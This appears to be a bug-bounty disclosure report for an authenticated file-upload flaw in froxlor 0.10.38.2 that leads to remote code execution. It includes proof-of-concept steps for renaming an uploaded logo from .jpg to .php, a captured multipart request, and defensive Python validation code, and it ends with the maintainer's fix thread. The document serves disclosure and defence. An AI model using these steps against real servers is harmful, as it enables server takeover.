froxlor/froxlor <= 0.10.38.2 - Authenticated Unrestricted File Upload to RCE in froxlor/froxlor

Valid

Reported on

Nov 7th 2022


Description

Unsafe file uploads occur when the web server fails to sufficiently validate an uploaded file's size, type, name or contents, or fails to restrict what can be done with the file once it has been stored. The application does not validate the files that are uploaded, allowing an attacker to upload unsafe files to the web server and gain access to folders in a directory that are not intended to be accessed.

Proof of Concept

1. Enable an HTTP intercept proxy, such as Burp Suite.
2. Log in to the administrator account.
3. With the HTTP intercept proxy turned on, use a browser to navigate to: System -> Settings -> Panel settings.
4. In the Logo Image (Header) or Logo Image (Login) field, upload the file s.jpg.

5. In the proxy software, intercept the POST request sent to /admin_settings.php, change the file extension in the filename from jpg to php, then forward the request.

6. The result can be arbitrary code execution on the server.

Request

POST /admin_settings.php HTTP/1.1
Host: localhost:8001
Content-Length: 166194
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8001
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySYA7fVL8S7T9epDH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8001/admin_settings.php?page=overview&part=panel&s=3f573ee5ef049a0728ea376883d4d3d9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="send"

send
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="s"

3f573ee5ef049a0728ea376883d4d3d9
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="page"

overview
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="action"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_standardlanguage"

English
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_default_theme"

Sparkle
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_customer"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_customer"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_admin"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_admin"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_natsorting"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_natsorting"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_paging"

20
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_pathedit"

Manual
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail"

admin@localhost
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail_defname"

Froxlor Administrator
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail_return"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_decimal_places"

4
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_phpmyadmin_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_webmail_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_webftp_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_version_login"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_version_footer"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_news_feed"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_news_feed"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="customer_show_news_feed"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="customer_news_feed_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_domain_change_admin"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_domain_change_customer"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_phpconfigs_hidestdsubdomain"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_imprint_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_terms_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_privacy_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_overridetheme"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_overridecustom"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_image_header"; filename="s.php"
Content-Type: image/jpeg

<image content>
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_image_login"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="part"

panel
------WebKitFormBoundarySYA7fVL8S7T9epDH--
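As an added defensive check (example code written for this page, not froxlor's own), the following Python screens a request of the kind captured above: it parses the multipart body, ignores the client-declared Content-Type, accepts only allow-listed image extensions whose bytes carry the matching magic number, and stores accepted files under a server-generated name. The boundary and field names are taken from the request above; the sample body, the allow-list and the function names are constructed for the example.

```python
import re
import secrets

# Boundary and field names below are those of the captured request above.
BOUNDARY = b"----WebKitFormBoundarySYA7fVL8S7T9epDH"
# Server-side allow-list: extension -> (MIME type, magic bytes). Constructed for the example.
ALLOWED = {"jpg": ("image/jpeg", b"\xff\xd8\xff"), "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
           "png": ("image/png", b"\x89PNG\r\n\x1a\n")}

def parse_multipart(body: bytes, boundary: bytes):
    """Yield (field, filename, declared_type, data) for each part of a form-data body."""
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):                      # closing delimiter
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        hdr = head.decode("latin-1")
        field = re.search(r'(?<!file)name="([^"]*)"', hdr)
        fname = re.search(r'filename="([^"]*)"', hdr)
        ctype = re.search(r"Content-Type:\s*(\S+)", hdr, re.I)
        yield (field.group(1) if field else "", fname.group(1) if fname else None,
               ctype.group(1) if ctype else None, data.removesuffix(b"\r\n"))

def check_logo_upload(filename: str, data: bytes):
    """Accept only allow-listed extensions whose bytes really are that image type."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not allowed", None
    mime, magic = ALLOWED[ext]
    if not data.startswith(magic):
        return False, f"content is not {mime}", None
    # Never reuse the client's name: store under a server-generated one.
    return True, "ok", f"logo_{secrets.token_hex(8)}.{ext}"

def screen_request(body: bytes, boundary: bytes = BOUNDARY):
    """Run every file part through check_logo_upload; the declared type is ignored on purpose."""
    return {field: check_logo_upload(fname, data)
            for field, fname, _declared, data in parse_multipart(body, boundary) if fname}

def _part(headers: bytes, data: bytes) -> bytes:
    return b"--" + BOUNDARY + b"\r\n" + headers + b"\r\n\r\n" + data + b"\r\n"

# Constructed body mirroring the captured request: a real JPEG uploaded as
# panel_logo_image_header, but with the filename changed from s.jpg to s.php.
SAMPLE_BODY = (
    _part(b'Content-Disposition: form-data; name="panel_logo_image_header"; filename="s.php"\r\n'
          b"Content-Type: image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 8)
    + _part(b'Content-Disposition: form-data; name="panel_logo_image_login"; filename=""\r\n'
            b"Content-Type: application/octet-stream", b"")
    + b"--" + BOUNDARY + b"--\r\n"
)
```

Calling `screen_request(SAMPLE_BODY)` rejects the header logo because of its .php extension even though the bytes are a valid JPEG and the declared type is image/jpeg, and skips the empty login-logo part.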

Impact

Unsafe file upload can lead to reputational damage for the business due to a loss in confidence from users who are attempting to perform legitimate actions within the application. It can also lead to indirect financial loss due to an attacker reading or manipulating files on the web server.

We are processing your report and will contact the froxlor team within 24 hours. 2 months ago
haidv modified the report
2 months ago
We have contacted a member of the froxlor team and are waiting to hear back 2 months ago
Michael Kaufmann validated this vulnerability 2 months ago

as per email upfront, thanks again for finding this. It will be resolved in the next release on 2nd of december

haidv has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
haidv
2 months ago

Researcher


Thanks. Can my vulnerability have bounty or CVE?

Michael Kaufmann marked this as fixed in 0.10.38.3 with commit 4d454a a month ago
Michael Kaufmann has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Dec 3rd 2022
Michael Kaufmann published this vulnerability a month ago
haidv
a month ago

Researcher


May I ask why my report doesn't have CVE like other reports?
